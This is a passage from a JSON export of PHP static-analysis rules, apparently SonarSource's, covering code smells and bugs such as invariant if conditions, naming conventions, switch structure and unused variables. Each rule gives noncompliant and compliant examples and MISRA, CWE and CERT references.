be removed","htmlDesc":"<p><code>if<\/code> statements with conditions that are always false have the effect of making blocks of code non-functional. <code>if<\/code>\nstatements with conditions that are always true are completely redundant, and make the code less readable.<\/p>\n<p>There are three possible causes for the presence of such code: <\/p>\n<ul>\n  <li> An if statement was changed during debugging and that debug code has been committed. <\/li>\n  <li> Some value was left unset. <\/li>\n  <li> Some logic is not doing what the programmer thought it did. <\/li>\n<\/ul>\n<p>In any of these cases, unconditional <code>if<\/code> statements should be removed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (true) {  \/\/ Noncompliant\n  doSomething();\n}\n...\nif (false) {  \/\/ Noncompliant\n  doSomethingElse();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndoSomething();\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/570.html\">MITRE, CWE-570<\/a> - Expression is Always False <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/571.html\">MITRE, CWE-571<\/a> - Expression is Always True <\/li>\n  <li> MISRA C:2004, 13.7 - Boolean operations whose results are invariant shall not be permitted. <\/li>\n  <li> MISRA C:2012, 14.3 - Controlling expressions shall not be invariant <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S115","repo":"php","name":"Constant names should comply with a naming convention","htmlDesc":"<p>Shared coding conventions allow teams to collaborate efficiently. 
This rule checks that all constant names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$<\/code>:<\/p>\n<pre>\ndefine(\"const1\", true);\n\nclass Foo {\n    const const2 = \"bar\";\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\ndefine(\"CONST1\", true);\n\nclass Foo {\n    const CONST2 = \"bar\";\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the constant names against.","defaultValue":"^[A-Z][A-Z0-9]*(_[A-Z0-9]+)*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1151","repo":"php","name":"\"switch case\" clauses should not have too many lines","htmlDesc":"<p>The <code>switch<\/code> statement should be used only to clearly define some new branches in the control flow. As soon as a <code>case<\/code>\nclause contains too many statements this highly decreases the readability of the overall control flow statement. 
In such case, the content of the\n<code>case<\/code> clause should be extracted into a dedicated method.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a threshold of 5:<\/p>\n<pre>\nswitch ($var) {\n  case 0:  \/\/ 6 lines till next case\n    methodCall1();\n    methodCall2();\n    methodCall3();\n    methodCall4();\n    break;\n  default:\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($var) {\n  case 0:\n    doSomething();\n    break;\n  default:\n    break;\n}\n\nfunction doSomething(){\n  methodCall1(\"\");\n  methodCall2(\"\");\n  methodCall3(\"\");\n  methodCall4(\"\");\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of lines","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S116","repo":"php","name":"Field names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. This rule allows to check that field\nnames match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\nclass MyClass {\n  $my_field;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass MyClass {\n  $myField;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the field names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S117","repo":"php","name":"Local variable and function parameter names should comply with a naming convention","htmlDesc":"<p>Sharing some naming conventions is a key point to make it possible for a team to efficiently collaborate. 
This rule allows to check that all local\nvariable and function parameter names match a provided regular expression.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default regular expression <code>^[a-z][a-zA-Z0-9]*$<\/code>:<\/p>\n<pre>\npublic function doSomething($my_param){\n  $LOCAL;\n  ...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\npublic function doSomething($myParam){\n  $local;\n  ...\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"format","htmlDesc":"Regular expression used to check the names against.","defaultValue":"^[a-z][a-zA-Z0-9]*$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1172","repo":"php","name":"Unused function parameters should be removed","htmlDesc":"<p>Unused parameters are misleading. Whatever the value passed to such parameters is, the behavior will be the same.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething($a, $b) { \/\/ \"$a\" is unused\n  return compute($b);\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething($b) {\n  return compute($b);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Functions in classes that override a class or implement interfaces are ignored.<\/p>\n<pre>\nclass C extends B {\n\n  function doSomething($a, $b) {     \/\/ no issue reported on $b\n    compute($a);\n  }\n\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C++:2008, 0-1-11 - There shall be no unused parameters (named or unnamed) in nonvirtual functions. 
<\/li>\n  <li> MISRA C:2012, 2.7 - There should be no unused parameters in functions <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1185","repo":"php","name":"Overriding methods should do more than simply call the same method in the super class","htmlDesc":"<p>Overriding a method just to call the same method from the super class without performing any other actions is useless and misleading. The only time\nthis is justified is in <code>final<\/code> overriding methods, where the effect is to lock in the parent class behavior. This rule ignores such\noverrides of <code>equals<\/code>, <code>hashCode<\/code> and <code>toString<\/code>.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nclass Child extends ParentClass {\n\n  public function func($n, $m) {\n    parent::func($n, $m);  \/\/ Noncompliant\n  }\n}\n\nclass ParentClass {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nclass Child extends ParentClass {\n\n  public function func($n, $m) {\n    parent::func($n, $m);\n    \/\/ do additional things...\n  }\n}\n\nclass ParentClass {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>\n<p>or<\/p>\n<pre>\nclass Child extends ParentClass {\n  \/\/ function eliminated\n}\n\nclass ParentClass {\n  public function func($n, $m) {\n    \/\/ do something\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1192","repo":"php","name":"String literals should not be duplicated","htmlDesc":"<p>Duplicated string literals make the process of refactoring error-prone, since you must be sure 
to update all occurrences.<\/p>\n<p>On the other hand, constants can be referenced from many places, but only need to be updated in a single place.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\nfunction run() {\n  prepare('action1');                              \/\/ Non-Compliant - 'action1' is duplicated 3 times\n  execute('action1');\n  release('action1');\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nconst ACTION_1 = 'action1';\n\nfunction run() {\n  prepare(ACTION_1);\n  execute(ACTION_1);\n  release(ACTION_1);\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>To prevent generating some false-positives, literals having fewer than 5 characters are excluded.<\/p>","status":"READY","tags":["rank1"],"langName":"PHP","params":[{"key":"threshold","htmlDesc":"Number of times a literal must be duplicated to trigger an issue","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1200","repo":"php","name":"Classes should not be coupled to too many other classes (Single Responsibility Principle)","htmlDesc":"<p>According to the Single Responsibility Principle, introduced by Robert C. 
Martin in his book \"Principles of Object Oriented Design\", a class should\nhave only one responsibility:<\/p>\n<blockquote>\n  <p>If a class has more than one responsibility, then the responsibilities become coupled.<\/p>\n  <p>Changes to one responsibility may impair or inhibit the class' ability to meet the others.<\/p>\n  <p>This kind of coupling leads to fragile designs that break in unexpected ways when changed.<\/p>\n<\/blockquote>\n<p>Classes which rely on many other classes tend to aggregate too many responsibilities and should be split into several smaller ones.<\/p>\n<p>Nested classes dependencies are not counted as dependencies of the outer class.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n  class Foo {            \/\/ Noncompliant - Foo depends on too many classes: T1, T2, T3, T4, T5, T6 and T7\n    \/**\n     * @var T1\n     *\/\n    public $a1;          \/\/ Foo is coupled to T1\n    \/**\n     * @var T2\n     *\/\n    protected $a2;       \/\/ Foo is coupled to T2\n    \/**\n     * @var T3\n     *\/\n    private $a3;         \/\/ Foo is coupled to T3\n\n    \/**\n     * @param T5\n     * @param T6\n     *\n     * @return T4\n     *\/\n    public function compute(T5 $a, $b) { \/\/ Foo is coupled to T4, T5 and T6\n      $result = new T7();     \/\/ Foo is coupled to T7\n      return $result;\n  }\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of classes a single class is allowed to depend upon","defaultValue":"20","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S121","repo":"php","name":"Control structures should use curly braces","htmlDesc":"<p>While not technically incorrect, the omission of curly braces can be misleading, and may lead to the introduction of errors during maintenance.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n\/\/ the two statements seems to be attached to the if statement, but that is only true for the first one:\nif (condition)\n  
executeSomething();\n  checkSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) {\n  executeSomething();\n  checkSomething();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.8 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n  <li> MISRA C:2004, 14.9 - An if (expression) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n  compound statement, or another if statement <\/li>\n  <li> MISRA C++:2008, 6-3-1 - The statement forming the body of a switch, while, do ... while or for statement shall be a compound statement <\/li>\n  <li> MISRA C++:2008, 6-4-1 - An if (condition) construct shall be followed by a compound statement. The else keyword shall be followed by either a\n  compound statement, or another if statement <\/li>\n  <li> MISRA C:2012, 15.6 - The body of an iteration-statement or a selection-statement shall be a compound-statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/1QGMAg\">CERT, EXP19-C.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/3wHEAw\">CERT, EXP52-J.<\/a> - Use braces for the body of an if, for, or while statement\n  <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S122","repo":"php","name":"Statements should be on separate lines","htmlDesc":"<p>For better readability, do not put more than one statement on a single line.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(someCondition) doSomething();\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif(someCondition) {\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Anonymous functions containing a single statement are ignored.<\/p>\n<pre>\n$max_comparator = function ($v) { return $v &gt; 2; };           \/\/ Compliant\n$max_comparator = 
function ($v) { echo $v; return $v &gt; 2; };  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S125","repo":"php","name":"Sections of code should not be \"commented out\"","htmlDesc":"<p>Programmers should not comment out code as it bloats programs and reduces readability.<\/p>\n<p>Unused code should be deleted and can be retrieved from source control history if required.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 2.4 - Sections of code should not be \"commented out\". <\/li>\n  <li> MISRA C++:2008, 2-7-2 - Sections of code shall not be \"commented out\" using C-style comments. <\/li>\n  <li> MISRA C++:2008, 2-7-3 - Sections of code should not be \"commented out\" using C++ comments. <\/li>\n  <li> MISRA C:2012, Dir. 4.4 - Sections of code should not be \"commented out\" <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S126","repo":"php","name":"\"if ... else if\" constructs should end with \"else\" clauses","htmlDesc":"<p>This rule applies whenever an <code>if<\/code> statement is followed by one or more <code>else if<\/code> statements; the final <code>else if<\/code>\nshould be followed by an <code>else<\/code> statement.<\/p>\n<p>The requirement for a final <code>else<\/code> statement is defensive programming.<\/p>\n<p>The <code>else<\/code> statement should either take appropriate action or contain a suitable comment as to why no action is taken. 
This is\nconsistent with the requirement to have a final <code>default<\/code> clause in a <code>switch<\/code> statement.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition1) {\n  do_something();\n} else if (condition2) {\n  do_something_else();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition1) {\n  do_something();\n} else if (condition2) {\n  do_something_else();\n} else {\n  throw new InvalidArgumentException('message');\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 14.10 - All if...else if constructs shall be terminated with an else clause. <\/li>\n  <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n  <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1264","repo":"php","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, but the init and increment expressions are missing, a <code>while<\/code>\nloop should be used instead to increase readability. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S127","repo":"php","name":"\"for\" loop stop conditions should be invariant","htmlDesc":"<p>A <code>for<\/code> loop stop condition should test the loop counter against an invariant value (i.e. one that is true at both the beginning and\nending of every loop iteration). Ideally, this means that the stop condition is set to a local variable just before the loop begins. <\/p>\n<p>Stop conditions that are not invariant are slightly less efficient, as well as being difficult to understand and maintain, and likely lead to the\nintroduction of errors in the future.<\/p>\n<p>This rule tracks three types of non-invariant stop conditions:<\/p>\n<ul>\n  <li> When the loop counters are updated in the body of the <code>for<\/code> loop <\/li>\n  <li> When the stop condition depend upon a method call <\/li>\n  <li> When the stop condition depends on an object property, since such properties could change during the execution of the loop. <\/li>\n<\/ul>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++) {\n  echo $i;\n  if(condition) {\n    $i = 20;\n  }\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor ($i = 0; $i &lt; 10; $i++) {\n  echo $i;\n}\n\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 13.6 - Numeric variables being used within a <em>for<\/em> loop for iteration counting shall not be modified in the body of the\n  loop. <\/li>\n  <li> MISRA C++:2008, 6-5-3 - The <em>loop-counter<\/em> shall not be modified within <em>condition<\/em> or <em>statement<\/em>. 
<\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S128","repo":"php","name":"Switch cases should end with an unconditional \"break\" statement","htmlDesc":"<p>When the execution is not explicitly terminated at the end of a switch case, it continues to execute the statements of the following case. While\nthis is sometimes intentional, it often is a mistake which leads to unexpected behavior. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($myVariable) {\n  case 1:\n    foo();\n    break;\n  case 2:  \/\/ Both 'do_something()' and 'do_something_else()' will be executed. Is it on purpose?\n    do_something();\n  default:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($myVariable) {\n  case 1:\n    foo();\n    break;\n  case 2:\n    do_something();\n    break;\n  default:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule is relaxed in the following cases:<\/p>\n<pre>\nswitch ($myVariable) {\n  case 0:                  \/\/ Empty case used to specify the same behavior for a group of cases.\n  case 1:\n    do_something();\n    break;\n  case 2:                  \/\/ Use of continue statement (inside a PHP switch it behaves like break)\n    continue;\n  case 3:                  \/\/ Case includes a jump statement (exit, return, break, etc.)\n    exit(0);\n  case 4:\n    echo 'Second case, which falls through';\n    \/\/ no break        &lt;- comment is used when fall-through is intentional in a non-empty case body\n  default:                 \/\/ For the last case, use of break statement is optional\n    do_something_else();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.2 - An unconditional break statement shall terminate every non-empty switch clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. 
<\/li>\n  <li> MISRA C++:2008, 6-4-5 - An unconditional throw or break statement shall terminate every non-empty switch-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.3 - An unconditional break statement shall terminate every switch-clause <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/484.html\">MITRE, CWE-484<\/a> - Omitted Break Statement in Switch <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YIFLAQ\">CERT, MSC17-C.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ZoFLAQ\">CERT, MSC18-CPP.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/ewHAAQ\">CERT, MSC52-J.<\/a> - Finish every set of statements associated with a case\n  label with a break statement <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"PHP","params":[],"type":"BUG"},{"key":"php:S1301","repo":"php","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($variable) {\n  case 0:\n    do_something();\n    break;\n  default:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif ($variable == 0) {\n  do_something();\n} else {\n  do_something_else();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n  <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. 
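The S128 rule above says a missing `break` "often is a mistake which leads to unexpected behavior". The following added example (not part of the SonarSource rule text) shows the security-relevant form of that mistake: a role-to-permission `switch` in which the `viewer` case falls through into `editor`, so a read-only user silently gains edit rights. The role and permission names are constructed for the illustration; the `match` variant assumes PHP 8.0 or later.

```php
<?php
declare(strict_types=1);

// Added example, not from the SonarSource rule text. Role and permission
// names are constructed for the illustration.

// Noncompliant: 'viewer' has no break, so execution runs on into 'editor'
// and overwrites the permissions that were just assigned.
function permissionsForRoleBuggy(string $role): array
{
    switch ($role) {
        case 'viewer':
            $perms = ['read_posts'];
            // missing break: falls through into 'editor'
        case 'editor':
            $perms = ['read_posts', 'edit_posts'];
            break;
        case 'admin':
            $perms = ['read_posts', 'edit_posts', 'manage_users'];
            break;
        default:
            $perms = [];
            break;
    }
    return $perms;
}

// Compliant: every non-empty case ends with an unconditional break, and the
// default clause refuses unknown roles instead of guessing.
function permissionsForRole(string $role): array
{
    switch ($role) {
        case 'viewer':
            $perms = ['read_posts'];
            break;
        case 'editor':
            $perms = ['read_posts', 'edit_posts'];
            break;
        case 'admin':
            $perms = ['read_posts', 'edit_posts', 'manage_users'];
            break;
        default:
            throw new InvalidArgumentException("unknown role: {$role}");
    }
    return $perms;
}

// PHP 8 alternative (assumption: PHP >= 8.0): match has no fall-through and
// throws UnhandledMatchError when no arm matches, so the default is explicit.
function permissionsForRoleMatch(string $role): array
{
    return match ($role) {
        'viewer' => ['read_posts'],
        'editor' => ['read_posts', 'edit_posts'],
        'admin'  => ['read_posts', 'edit_posts', 'manage_users'],
    };
}

// Does a viewer end up with edit rights? Only the buggy switch says yes.
var_dump(in_array('edit_posts', permissionsForRoleBuggy('viewer'), true));
var_dump(in_array('edit_posts', permissionsForRole('viewer'), true));
var_dump(in_array('edit_posts', permissionsForRoleMatch('viewer'), true));
```

Run it with `php` on the command line: the first `var_dump` reports the escalated permission, the other two do not. The fixed versions also show why the rule pairs with S131: an unknown role should fail closed rather than fall into whatever case happens to be last.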
<\/li>\n  <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S131","repo":"php","name":"Statements should end with a \"case default\" clause","htmlDesc":"<p>The requirement for a final <code>case default<\/code> clause is defensive programming. The clause should either take appropriate action, or contain\na suitable comment as to why no action is taken. Even when the <code>switch<\/code> covers all current values of an <code>enum<\/code>, a default case\nshould still be used because there is no guarantee that the <code>enum<\/code> won't be extended.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch ($param) {  \/\/missing default clause\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n}\n\nswitch ($param) {\n  default: \/\/ default clause should be the last one\n    error();\n    break;\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch ($param) {\n  case 0:\n    do_something();\n    break;\n  case 1:\n    do_something_else();\n    break;\n  default:\n    error();\n    break;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C:2004, 15.3 - The final clause of a switch statement shall be the default clause <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. 
<\/li>\n  <li> MISRA C++:2008, 6-4-6 - The final clause of a switch statement shall be the default-clause <\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n  <li> MISRA C:2012, 16.4 - Every <em>switch<\/em> statement shall have a <em>default<\/em> label <\/li>\n  <li> MISRA C:2012, 16.5 - A <em>default<\/em> label shall appear as either the first or the last <em>switch label<\/em> of a <em>switch<\/em> statement\n  <\/li>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/478.html\">MITRE, CWE-478<\/a> - Missing Default Case in Switch Statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S134","repo":"php","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements are a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a threshold of 3:<\/p>\n<pre>\n  if (condition1) {                  \/\/ Compliant - depth = 1\n    ...\n    if (condition2) {                \/\/ Compliant - depth = 2\n      ...\n      for($i = 0; $i &lt; 10; $i++) {  \/\/ Compliant - depth = 3, not exceeding the limit\n        ...\n        if (condition4) {            \/\/ Non-Compliant - depth = 4\n          if (condition5) {          \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n            ...\n          }\n          return;\n        }\n      }\n    }\n  }\n<\/pre>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum allowed control flow statement nesting depth.","defaultValue":"4","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S138","repo":"php","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>","status":"READY","tags":["rank3"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"150","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S139","repo":"php","name":"Comments should not be located at the end of lines of code","htmlDesc":"<p>This rule verifies that single-line comments are not located at the ends of lines of code. 
The main idea behind this rule is that in order to be\nreally readable, trailing comments would have to be properly written and formatted (correct alignment, no interference with the visual structure of\nthe code, not too long to be visible) but most often, automatic code formatters would not handle this correctly: the code would end up less readable.\nComments are far better placed on the previous empty line of code, where they will always be visible and properly formatted.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\n$a = $b + $c; \/\/ This is a trailing comment that can be very very long\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\n\/\/ This very long comment is better placed before the line of code\n$a = $b + $c;\n<\/pre>","status":"READY","tags":["rank4"],"langName":"PHP","params":[{"key":"legalTrailingCommentPattern","htmlDesc":"Pattern for text of trailing comments that are allowed. By default, comments containing only one word.","defaultValue":"^(\/\/|#)\\s*+[^\\s]++$","type":"STRING"}],"type":"CODE_SMELL"},{"key":"php:S1479","repo":"php","name":"\"switch\" statements should not have too many \"case\" clauses","htmlDesc":"<p>When <code>switch<\/code> statements have large sets of <code>case<\/code> clauses, it is usually an attempt to map two sets of data. A real map\nstructure would be more readable and maintainable, and should be used instead.<\/p>","status":"READY","tags":["rank5"],"langName":"PHP","params":[{"key":"max","htmlDesc":"Maximum number of case","defaultValue":"30","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"php:S1481","repo":"php","name":"Unused local variables should be removed","htmlDesc":"<p>If a local variable is declared but not used, it is dead code and should be removed. 
Doing so will improve maintainability because developers will\nnot wonder what the variable is used for.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n  $seconds = 0;   \/\/ $seconds is never used\n  return $hours * 60;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction numberOfMinutes($hours) {\n  return $hours * 60;\n}\n<\/pre>","status":"READY","tags":["rank3"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1488","repo":"php","name":"Local Variables should not be declared and then immediately returned or thrown","htmlDesc":"<p>Declaring a variable only to immediately return or throw it is a bad practice.<\/p>\n<p>Some developers argue that the practice improves code readability, because it enables them to explicitly name what is being returned. However, this\nvariable is an internal implementation detail that is not exposed to the callers of the method. The method name should be sufficient for callers to\nknow exactly what will be returned.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds($hours, $minutes, $seconds) {\n  $duration = ((($hours * 60) + $minutes) * 60 + $seconds) * 1000;\n  return $duration;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction compute_duration_in_milliseconds($hours, $minutes, $seconds) {\n  return ((($hours * 60) + $minutes) * 60 + $seconds) * 1000;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"PHP","params":[],"type":"CODE_SMELL"},{"key":"php:S1523","repo":"php","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. <\/p>\n<p>According to the PHP documentation:<\/p>\n<blockquote>\n  <p>The eval() language construct is very dangerous because it allows execution of arbitrary PHP code. Its use thus is discouraged. 
